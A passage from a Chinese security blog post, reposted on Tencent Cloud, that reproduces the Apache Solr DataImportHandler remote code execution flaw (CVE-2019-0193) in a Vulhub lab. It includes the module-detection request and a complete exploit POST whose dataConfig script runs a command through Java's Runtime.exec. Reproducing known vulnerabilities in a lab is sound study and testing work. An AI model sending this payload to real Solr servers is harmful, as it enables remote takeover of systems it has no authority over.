前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Apache Solr远程代码执行(CVE-2019-0193)漏洞复现

Apache Solr远程代码执行(CVE-2019-0193)漏洞复现

作者头像
sugarbeet
发布2022-09-26 19:16:49
1.2K0
发布2022-09-26 19:16:49
举报
文章被收录于专栏:小满的技术录小满的技术录

Apache Solr远程代码执行(CVE-2019-0193)漏洞复现

Solr简介:

Apache Solr 是一个开源的企业级搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。Apache Solr 中存储的资源是以 Document 为对象进行存储的。它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。

漏洞概述:

此漏洞存在于可选模块DataImportHandler中,DataImportHandler是用于从数据库或其他源提取数据的常用模块,该模块中所有DIH配置都可以通过外部请求的dataConfig参数来设置,由于DIH配置可以包含脚本,因此该参数存在安全隐患。攻击者可利用dataConfig参数构造恶意请求,实现远程代码执行。

影响范围:

Apache Solr <8.2.0

复现

1、环境搭建:

使用Vulhub,简单方便

创建Core

代码语言:javascript
复制
docker-compose exec solr bash bin/solr create_core -c test_0nth3way -d example/example-DIH/solr/db

2、复现

访问
代码语言:javascript
复制
IP:8983/solr/admin/cores

Payload需要这个name字段

检测是否有DataImportHandler模块
代码语言:javascript
复制
http://IP:8983/solr/test_0nth3way/admin/mbeans?cat=QUERY&wt=json

org.apache.solr.handler.dataimport.DataImportHandler就说明有DataImportHandler模块

Payload

将<your_core_name>改为上面所说的name字段,IP改为服务器IP

代码语言:javascript
复制
POST /solr/<your_core_name>/dataimport HTTP/1.1
Host: IP:8983
Content-Length: 763
User-Agent: Mozilla/5.0
Content-type: application/x-www-form-urlencoded
Connection: close

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec("touch /var/solr/data/test_0nth3way/data/test");
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>
使用Burp发包
image-20210414215059642
image-20210414215059642
image-20210414215225303
image-20210414215225303

Q.E.D.

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021-12-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Apache Solr远程代码执行(CVE-2019-0193)漏洞复现
    • Solr简介:
      • 漏洞概述:
        • 影响范围:
          • 复现
            • 1、环境搭建:
            • 2、复现
        相关产品与服务
        容器服务
        腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档